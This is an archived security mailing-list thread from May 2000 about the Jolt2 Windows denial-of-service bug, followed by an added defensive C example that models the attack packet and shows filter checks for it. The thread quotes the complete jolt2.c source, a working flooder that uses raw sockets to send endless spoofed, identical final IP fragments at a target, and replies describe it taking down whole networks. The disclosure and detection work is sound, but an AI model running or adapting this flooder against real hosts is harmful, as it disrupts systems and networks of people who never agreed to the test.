Subject: Re: Windows DoS code (jolt2.c)
From: Mats Remman (mats@HINUX.HIN.NO)
Date: Fri May 26 2000 - 11:24:48 CDT
- Next message: David LeBlanc: "Re: Windows DoS code (jolt2.c)"
- Previous message: Microsoft Product Security: "Microsoft Security Bulletin (MS00-036)"
- In reply to: Craig Williams: "Re: Windows DoS code (jolt2.c)"
- Next in thread: Phonix: "Re: Windows DoS code (jolt2.c)"
- Next in thread: Pepin, Dany: "Re: Windows DoS code (jolt2.c)"
- Reply: Mats Remman: "Re: Windows DoS code (jolt2.c)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
-p 139 works on most computers, even Amiga.
It made my dual P133 get pretty loaded when running it.
Patches against it were published by MS a week ago.
URL: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20829
Mats Remman
Student at Narvik College of Technology, NORWAY
----- Original Message -----
From: "Craig Williams" <craig.williams@HOOKRISE.COM>
To: <win2ksecadvice@LISTSERV.NTSECURITY.NET>
Sent: Friday, May 26, 2000 4:10 PM
Subject: Re: Windows DoS code (jolt2.c)
> I had the same result; in testing, our internal 10meg LAN took
> a beating while the code was running.
>
> This can do serious damage to NT Web Servers!
>
> Does this code only attack one port? It appears to allow a port
> to be specified.
>
> What is the concept behind this exploit?
>
> Craig
>
> > -----Original Message-----
> > From: SMILER [mailto:smiler@VXD.ORG]
> > Sent: 26 May 2000 14:12
> > To: win2ksecadvice@LISTSERV.NTSECURITY.NET
> > Subject: Re: Windows DoS code (jolt2.c)
> >
> >
> > This code does more than taking a windoze box to its knees!! Well, I am in a
> > network where we've got a 128k link and I used my shell account at the ISP
> > with a really fast link to jolt one of the machines in my network. As soon
> > as I pressed ENTER I lost connectivity in the whole network... I couldn't
> > even try to stop the jolt... fortunately I had a backup ISDN connection that
> > I used to stop the process!! Amazing flood!!!
> > My point is... how could I protect my network from being flooded by someone
> > using such a powerful tool?? Even if I use a packet filter at the entrance
> > of my network I get flooded because my router will get 100% inbound traffic!!
> > The only way that I can think of is asking my provider to re-route the
> > traffic from the jolt source to a "dead-end" somehow! Any suggestions?
> >
> > smiler@vxd.org
> >
> > ----- Original Message -----
> > From: Steve <steve@SECURESOLUTIONS.ORG>
> > To: <win2ksecadvice@LISTSERV.NTSECURITY.NET>
> > Sent: Thursday, May 25, 2000 9:48 PM
> > Subject: Windows DoS code (jolt2.c)
> >
> >
> > > -----BEGIN PGP SIGNED MESSAGE-----
> > > Hash: SHA1
> > >
> > > Here is some proof of concept code for the Jolt2 DoS reported by
> > > BindView Razor Team (http://razor.bindview.com). Note, this code was
> > > not created by me, I am simply passing it on to the mailing list.
> > > Send all questions/problems to the author of the code,
> > > phonix@moocow.org
> > >
> > > Regards;
> > >
> > > Steve Manzuik
> > > Moderator
> > >
> > > - --------------snip----------------
> > >
> > >
> > >
> > > /*
> > > * File: jolt2.c
> > > * Author: Phonix <phonix@moocow.org>
> > > * Date: 23-May-00
> > > *
> > > * Description: This is the proof-of-concept code for the
> > > * Windows denial-of-service attack described by
> > > * the Razor team (NTBugtraq, 19-May-00)
> > > * (MS00-029). This code causes cpu utilization
> > > * to go to 100%.
> > > *
> > > * Tested against: Win98; NT4/SP5,6; Win2K
> > > *
> > > * Written for: My Linux box. YMMV. Deal with it.
> > > *
> > > * Thanks: This is standard code. Ripped from lots of places.
> > > * Insert your name here if you think you wrote some of
> > > * it. It's a trivial exploit, so I won't take credit
> > > * for anything except putting this file together.
> > > */
> > >
> > > #include <stdio.h>
> > > #include <stdlib.h>      /* exit(), atoi() */
> > > #include <string.h>
> > > #include <unistd.h>      /* close(), gethostname() */
> > > #include <netdb.h>
> > > #include <sys/socket.h>
> > > #include <sys/types.h>
> > > #include <netinet/in.h>
> > > #include <netinet/ip.h>
> > > #include <netinet/ip_icmp.h>
> > > #include <netinet/udp.h>
> > > #include <arpa/inet.h>
> > > #include <getopt.h>
> > >
> > > struct _pkt
> > > {
> > > struct iphdr ip;
> > > union {
> > > struct icmphdr icmp;
> > > struct udphdr udp;
> > > } proto;
> > > char data;
> > > } pkt;
> > >
> > > int icmplen = sizeof(struct icmphdr),
> > > udplen = sizeof(struct udphdr),
> > > iplen = sizeof(struct iphdr),
> > > spf_sck;
> > >
> > > void usage(char *pname)
> > > {
> > > fprintf (stderr, "Usage: %s [-s src_addr] [-p port] dest_addr\n",
> > > pname);
> > > fprintf (stderr, "Note: UDP used if a port is specified, otherwise ICMP\n");
> > > exit(0);
> > > }
> > >
> > > u_long host_to_ip(char *host_name)
> > > {
> > > static u_long ip_bytes;
> > > struct hostent *res;
> > >
> > > res = gethostbyname(host_name);
> > > if (res == NULL)
> > > return (0);
> > > memcpy(&ip_bytes, res->h_addr, res->h_length);
> > > return (ip_bytes);
> > > }
> > >
> > > void quit(char *reason)
> > > {
> > > perror(reason);
> > > close(spf_sck);
> > > exit(-1);
> > > }
> > >
> > > int do_frags (int sck, u_long src_addr, u_long dst_addr, int port)
> > > {
> > > int bs, psize;
> > > unsigned long x;
> > > struct sockaddr_in to;
> > >
> > > to.sin_family = AF_INET;
> > > to.sin_port = 1235;
> > > to.sin_addr.s_addr = dst_addr;
> > >
> > > if (port)
> > > psize = iplen + udplen + 1;
> > > else
> > > psize = iplen + icmplen + 1;
> > > memset(&pkt, 0, psize);
> > >
> > > pkt.ip.version = 4;
> > > pkt.ip.ihl = 5;
> > > /* As in the original: the byte-swapped header+ICMP length plus 40 in host
> > > * order, so the declared total length does not match what is sent. */
> > > pkt.ip.tot_len = htons(iplen + icmplen) + 40;
> > > pkt.ip.id = htons(0x455);
> > > pkt.ip.ttl = 255;
> > > pkt.ip.protocol = (port ? IPPROTO_UDP : IPPROTO_ICMP);
> > > pkt.ip.saddr = src_addr;
> > > pkt.ip.daddr = dst_addr;
> > > /* Flags clear (no MF), offset 8190 * 8 = 65520: a "last" fragment placed
> > > * right at the 65535-byte datagram limit. This is the whole trick. */
> > > pkt.ip.frag_off = htons (8190);
> > >
> > > if (port)
> > > {
> > > pkt.proto.udp.source = htons(port|1235);
> > > pkt.proto.udp.dest = htons(port);
> > > pkt.proto.udp.len = htons(9);
> > > pkt.data = 'a';
> > > } else {
> > > pkt.proto.icmp.type = ICMP_ECHO;
> > > pkt.proto.icmp.code = 0;
> > > pkt.proto.icmp.checksum = 0;
> > > }
> > >
> > > /* Flood identical fragments (same id, same offset) until killed. */
> > > while (1) {
> > > bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to,
> > > sizeof(struct sockaddr));
> > > }
> > > return bs;
> > > }
> > >
> > > int main(int argc, char *argv[])
> > > {
> > > u_long src_addr, dst_addr;
> > > int i, bs=1, port=0;
> > > char hostname[32];
> > >
> > > if (argc < 2)
> > > usage (argv[0]);
> > >
> > > gethostname (hostname, 32);
> > > src_addr = host_to_ip(hostname);
> > >
> > > while ((i = getopt (argc, argv, "s:p:h")) != EOF)
> > > {
> > > switch (i)
> > > {
> > > case 's':
> > > /* -s sets the (spoofed) source address; the original assigned
> > > * dst_addr here, which was then overwritten below. */
> > > src_addr = host_to_ip(optarg);
> > > if (!src_addr)
> > > quit("Bad source address given.");
> > > break;
> > >
> > > case 'p':
> > > port = atoi(optarg);
> > > if ((port <=0) || (port > 65535))
> > > quit ("Invalid port number given.");
> > > break;
> > >
> > > case 'h':
> > > default:
> > > usage (argv[0]);
> > > }
> > > }
> > >
> > > dst_addr = host_to_ip(argv[argc-1]);
> > > if (!dst_addr)
> > > quit("Bad destination address given.");
> > >
> > > /* Raw socket: needs root. socket() returns -1 on failure, not 0. */
> > > spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
> > > if (spf_sck < 0)
> > > quit("socket()");
> > > if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *)&bs,
> > > sizeof(bs)) < 0)
> > > quit("IP_HDRINCL");
> > >
> > > do_frags (spf_sck, src_addr, dst_addr, port);
> > > return 0;
> > > }
> > >
> > > -----BEGIN PGP SIGNATURE-----
> > > Version: PGPfreeware 6.5.3 for non-commercial use <http://www.pgp.com>
> > >
> > > iQA/AwUBOS2ReDV9eGvIXwM6EQLOzgCgqF+8K+s95q7PXp6WE6HXFJVKXgMAn1ek
> > > IAkI+Hv0ul66TxRmIJP1LqRH
> > > =sSSM
> > > -----END PGP SIGNATURE-----
> >
> > _____________________________________________________________________
> > ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
> > ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
> > SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net
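Added example for this page (not code from jolt2.c, its author, or any poster in the thread), for Craig's question about the concept and SMILER's about filtering: it rebuilds in memory the 29-byte ICMP datagram that do_frags() hands to sendto() and runs it through the checks a reassembler or border filter can apply. The field values are taken from jolt2.c: fragment offset 8190 (65520 bytes), MF clear, a fixed IP id of 0x455, and tot_len = htons(28) + 40, which on a little-endian sender is 0x281C. Whether that value reaches the wire depends on the sending kernel (a Linux raw socket with IP_HDRINCL overwrites Total Length, per raw(7)), so the caller chooses which to model. The addresses 10.0.0.1 and 10.0.0.2, the 64-slot table and the repeat threshold of 8 are assumptions made for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define IP_MAX_DATAGRAM 65535u
#define IP_MF           0x2000u   /* More Fragments flag in frag_off */
#define IP_OFFSET_MASK  0x1fffu   /* 13-bit fragment offset, in 8-byte units */
#define TRACK_SLOTS     64        /* assumed table size for the demo */
#define REPEAT_LIMIT    8         /* identical fragments tolerated (assumed) */

/* Bitmask returned by the checks below. */
enum { FRAG_OK = 0, FRAG_SHORT = 1, FRAG_LEN_MISMATCH = 2,
       FRAG_OVERSIZED = 4, FRAG_REPEATED = 8 };

struct frag_view { uint32_t src, dst; uint16_t id, tot_len, offset_bytes, payload_len; int more_fragments; };
struct track { uint32_t src, dst; uint16_t id, offset; int used; unsigned count; };
static struct track table[TRACK_SLOTS];

static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t rd32(const uint8_t *p) { return ((uint32_t)rd16(p) << 16) | rd16(p + 2); }
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)v; }

/* The 29-byte ICMP datagram do_frags() sends: 20-byte IP header, 8-byte ICMP
 * header, 1 data byte; MF clear, offset 8190 (65520 bytes), id 0x455.
 * wire_tot_len: 0x281C models the value jolt2.c writes on a little-endian host,
 * 29 models a Linux raw socket that has rewritten Total Length.
 * Addresses 10.0.0.1 -> 10.0.0.2 are made up for the example. */
size_t build_jolt2_icmp(uint8_t *buf, size_t cap, uint16_t wire_tot_len)
{
    const size_t len = 20 + 8 + 1;
    if (cap < len) return 0;
    memset(buf, 0, len);
    buf[0] = 0x45;                      /* version 4, IHL 5 */
    wr16(buf + 2, wire_tot_len);
    wr16(buf + 4, 0x0455);              /* id never changes */
    wr16(buf + 6, 8190);                /* flags 000, offset 8190 */
    buf[8] = 255; buf[9] = 1;           /* ttl, IPPROTO_ICMP; checksum left 0 as in jolt2.c */
    buf[12] = 10; buf[15] = 1;          /* src 10.0.0.1 */
    buf[16] = 10; buf[19] = 2;          /* dst 10.0.0.2 */
    buf[20] = 8;                        /* ICMP_ECHO */
    return len;
}

/* Stateless checks a reassembler should apply before touching any state. */
int check_fragment(const uint8_t *pkt, size_t len, struct frag_view *v)
{
    struct frag_view local;
    int flags = FRAG_OK;
    if (!v) v = &local;
    if (len < 20 || (pkt[0] >> 4) != 4) return FRAG_SHORT;
    size_t ihl = (pkt[0] & 0x0f) * 4u;
    if (ihl < 20 || len < ihl) return FRAG_SHORT;
    uint16_t fo = rd16(pkt + 6);
    v->src = rd32(pkt + 12);  v->dst = rd32(pkt + 16);
    v->id = rd16(pkt + 4);    v->tot_len = rd16(pkt + 2);
    v->offset_bytes = (uint16_t)((fo & IP_OFFSET_MASK) * 8u);
    v->more_fragments = (fo & IP_MF) != 0;
    v->payload_len = (uint16_t)(len - ihl);
    if (v->tot_len != len) flags |= FRAG_LEN_MISMATCH;
    /* Test both the bytes that arrived and the length the sender declared:
     * the attacker controls both, and reassembly must trust neither blindly. */
    if ((uint32_t)v->offset_bytes + v->payload_len > IP_MAX_DATAGRAM ||
        (v->tot_len > ihl && (uint32_t)v->offset_bytes + (v->tot_len - ihl) > IP_MAX_DATAGRAM))
        flags |= FRAG_OVERSIZED;
    return flags;
}

/* Stateful check: jolt2 never varies source, id or offset, so the same final
 * fragment of the same datagram arrives endlessly; a real retransmission
 * repeats a few times, not thousands. Keyed on (src, dst, id, offset). */
int note_fragment(const struct frag_view *v)
{
    struct track *slot = NULL;
    for (int i = 0; i < TRACK_SLOTS; i++) {
        struct track *t = &table[i];
        if (!t->used) { if (!slot) slot = t; continue; }
        if (t->src == v->src && t->dst == v->dst && t->id == v->id && t->offset == v->offset_bytes)
            return ++t->count > REPEAT_LIMIT ? FRAG_REPEATED : FRAG_OK;
    }
    if (!slot) slot = &table[0];        /* crude eviction, enough for a demo */
    *slot = (struct track){ .src = v->src, .dst = v->dst, .id = v->id,
                            .offset = v->offset_bytes, .used = 1, .count = 1 };
    return FRAG_OK;
}

void reset_tracking(void) { memset(table, 0, sizeof table); }

/* Feed n identical jolt2 fragments through both checks; returns the OR of all flags. */
int inspect_jolt2_stream(unsigned n, uint16_t wire_tot_len, struct frag_view *out)
{
    uint8_t buf[64];
    struct frag_view local, *v = out ? out : &local;
    size_t len = build_jolt2_icmp(buf, sizeof buf, wire_tot_len);
    int flags = FRAG_OK;
    reset_tracking();
    for (unsigned i = 0; i < n; i++) {
        flags |= check_fragment(buf, len, v);
        flags |= note_fragment(v);
    }
    return flags;
}

/* Convenience: the byte offset the jolt2 header decodes to (65520). */
unsigned jolt2_offset_bytes(void)
{
    uint8_t buf[64]; struct frag_view v;
    check_fragment(buf, build_jolt2_icmp(buf, sizeof buf, 29), &v);
    return v.offset_bytes;
}
```

With the length as jolt2.c writes it, the fragment fails the stateless checks twice over: the declared length disagrees with the 29 bytes received, and 65520 + 10248 would overrun a 65535-byte datagram. With the kernel-corrected length of 29 it passes every stateless test, since 65520 + 9 still fits, and what remains is the stream itself: the same final fragment of the same datagram id from the same source, without end, which the per-(src, dst, id, offset) counter flags after REPEAT_LIMIT repeats. That is the signature a border filter or IDS has to key on; as SMILER notes, none of this stops the bytes from arriving on a saturated link.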